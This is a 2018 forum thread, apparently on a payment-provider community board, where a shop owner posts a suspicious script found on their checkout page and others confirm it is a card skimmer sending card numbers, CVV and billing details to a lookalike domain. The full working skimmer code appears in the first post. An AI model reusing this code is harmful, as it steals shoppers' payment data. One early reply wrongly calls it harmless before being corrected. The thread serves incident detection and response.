Hello,
Can you please help me?
My former developer left in kind of a hurry and i am afraid that he has modified the code of my shop too.
I found a suspicious line on the payment site:
<script type="text/javascript">$(":button").click(function() { if(document.getElementsByName('CCCode')[0].value.length>1) { var xmlhttp; if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } else { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.open("POST", "https://authorizen.net/XXX.php", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send('data='+document.getElementsByName('CCNumber')[0].value+'|'+document.getElementsByName('CCExMonth')[0].options[document.getElementsByName('CCExMonth')[0].selectedIndex].value+'|'+document.getElementsByName('CCExYear')[0].options[document.getElementsByName('CCExYear')[0].selectedIndex].value+'|'+document.getElementsByName('CCCode')[0].value+'|'+document.getElementsByName('CCName')[0].value+'|'+document.getElementsByName('CCAddress')[0].value+'|'+document.getElementsByName('CCCity')[0].value+'|'+document.getElementsByName('CCState')[0].value+'|'+document.getElementsByName('CCZip')[0].value+'|'+document.getElementsByName('CCCountry')[0].value+'|'+document.getElementsByName('CCPhone')[0].value); }});
I noticed that it posts to authorizeN.net not authorize.net. (XXX is a substitue for private data)
Is this something to worry about?
Thanks,
feri
11-14-2018 09:18 AM
Without even examining the rest of your code, the url seems hardly malicious. If you type that in a browser it redirects to authorize.net, which is a pretty dead on guarantee authorize.net owns that domain too (companies buy domains that are nearly identical to their primary domain name all the time for a number of reasons, and it would be a little unusual for malicous site to redirect you to a legitimate site.).
11-15-2018 09:53 AM - edited 11-15-2018 09:54 AM
The domain resolves to an ip address out of Montenegro. So unless authorize.net has servers in that country I would say it is suspicious.
11-15-2018 12:08 PM
Authorize.Net definitely does not have an api endpoint in that format. The form should be taken offline until it is worked out.
11-16-2018 10:20 AM
11-17-2018 12:42 AM
That address is redirecting back to authorize.net. If authorize.net has no connection to that domain it means some is purposely redirecting it. The ip for that domain is tracing back to Montenegro in Europe.
If this code is inside a working payment form then that script has nothing to do with the normal functionality of the page and it is simply sending credit card info to some unkown server in Montenegro.
It might not be malicious concerning the previous developer, they might not have been aware of it but I disagree that there is no chance of harm coming from the domain.
That script doesn't look like anything a developer would use to communicate with authorize.net.
Newegg had a similar hack a few months ago. Hackers setup a fake domain(neweggstats.com) name with a ssl certificate. They were able to inject script code into the payment form that skimmed credit card info.
11-18-2018 07:20 AM
I have the same problem, please help!
11-18-2018 11:22 AM - edited 11-18-2018 11:23 AM
11-18-2018 02:19 PM
@andreer
Then you probably were compromised as well, as there is no way this is a legitimate domain owned by Authorize.net. Are both of you possibly running JQuery File Upload (or one of it's derivatives) as every Tom, Dick and Harriet is targeting sites running that as we speak.
11-21-2018 07:38 PM - edited 11-21-2018 07:38 PM
I posted about this the other day and accidentally deleted my post trying to edit it. I was dead wrong. I looked up this domain and it is not owned by authorize.net. Authoriz.net and Authorized.net are also redirect domains, and both domains have authorize.net listed as the owner on the registry. It is clear that authorize.net publicly claims ownership of any domain they own.
authorizen.net is listed under GTO Projects Limited, and one or more domains under GTO ltd have been logged by brute forcers blacklist for attempted brute force attacks on other websites.
What threw me off was that the developer was suspected of editing the code. It seemed to me that this would be a rather expensive way of monetizing on a fake domain. I'll let others chime in, but as has been said it looks like sites have been compromised, and it is most likely not rogue developers behind the scenes, but code execution/XSS attacks. Was that what you suspected menudrive-myles ?
11-25-2018 09:33 AM